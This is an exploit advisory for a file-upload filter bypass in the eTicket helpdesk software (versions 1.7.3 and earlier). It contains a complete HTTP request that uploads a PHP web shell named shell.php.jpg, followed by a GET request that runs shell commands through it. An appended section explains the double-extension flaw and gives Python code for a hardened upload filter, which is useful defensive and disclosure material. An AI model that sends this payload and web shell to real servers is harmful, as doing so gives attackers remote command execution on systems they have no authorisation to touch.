eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution)

2015.12.22
Credit: Saeid Atabaki
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution)
# Date: 17/11/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Advisory URL: https://www.nsecurity.org/advisories/
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://www.eticketsupport.com
# Version: <= 1.7.3
# Tested on: Apache 2.2, PHP 5.1, MySQL 5.4

Summary:

eTicket is a PHP-based electronic support ticket system that can receive tickets via email (pop3/pipe) or a web form. It also offers a ticket manager with many features. An ideal, easy to use and install helpdesk solution for any website.

1. PoC request

POST /eticket/open.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/eticket/
Cookie: Xplico=o0treq4pla0r3acd51d5131p76; PHPSESSID=0380uicd4n00ambkpfaucv6mm4
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1321807899848630298734395199
Content-Length: 1328

-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="name"

Saeid
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="email"

bytecod3r@gmail.com
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="email_confirm"

bytecod3r@gmail.com
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="phone"


-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="cat"

1
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="subject"

Test
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="message"

test
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="pri"

1
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="attachment"; filename="shell.php.jpg"
Content-Type: image/jpeg

<?php echo "\n\n"; passthru($_GET['cmd']); ?>
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="submit_x"

Open Ticket
-----------------------------1321807899848630298734395199--

2. Click on "View Open Tickets" in the control panel and get the file name; it should be something like xxx_shell.php.jpg.

3. GET /eticket/attachments/590_shell.php.jpg?cmd=ls HTTP/1.1
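The bypass works because the attachment filter only looks at the final extension, while Apache configurations that map the PHP handler by extension can execute a file that carries ".php" anywhere in its name. The following is an added example (not eTicket's code, and the naive filter is an assumed reconstruction of that behaviour) contrasting such a check with a hardened one that allows exactly one extension from an allow-list, rejects any executable extension token, and replaces the client-supplied stem with a server-chosen random name; the attachments directory should additionally have script execution disabled in the web server.

```python
import re
import secrets
from pathlib import PurePosixPath

# Extensions a PHP handler mapped by extension may execute wherever they
# appear in the name, not only at the end (assumed list, extend as needed).
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Attachment types the ticket system is willing to store (assumed allow-list).
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "txt", "pdf"}


def naive_filter_accepts(filename: str) -> bool:
    """Filter of the kind the advisory bypasses: only the last extension
    is inspected, so "shell.php.jpg" passes as a JPEG."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXTS


def hardened_filter_accepts(filename: str) -> bool:
    """Accept only <stem>.<ext> with a single allow-listed extension, no
    path components, no hidden-file prefix, and no executable token."""
    base = PurePosixPath(filename).name
    if base != filename or not base or base.startswith("."):
        return False  # path traversal attempt or empty/hidden name
    parts = base.lower().split(".")
    if len(parts) != 2:
        return False  # zero or multiple extensions (e.g. shell.php.jpg)
    stem, ext = parts
    if ext not in ALLOWED_EXTS or ext in EXECUTABLE_EXTS:
        return False
    # Conservative stem charset keeps shell metacharacters and backslashes out.
    return re.fullmatch(r"[a-z0-9_-]{1,64}", stem) is not None


def stored_name(filename: str) -> str:
    """Server-chosen on-disk name: random token plus the validated extension,
    so nothing the client typed reaches the filesystem."""
    if not hardened_filter_accepts(filename):
        raise ValueError("rejected upload: " + filename)
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```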

References:

https://www.nsecurity.org/advisories/

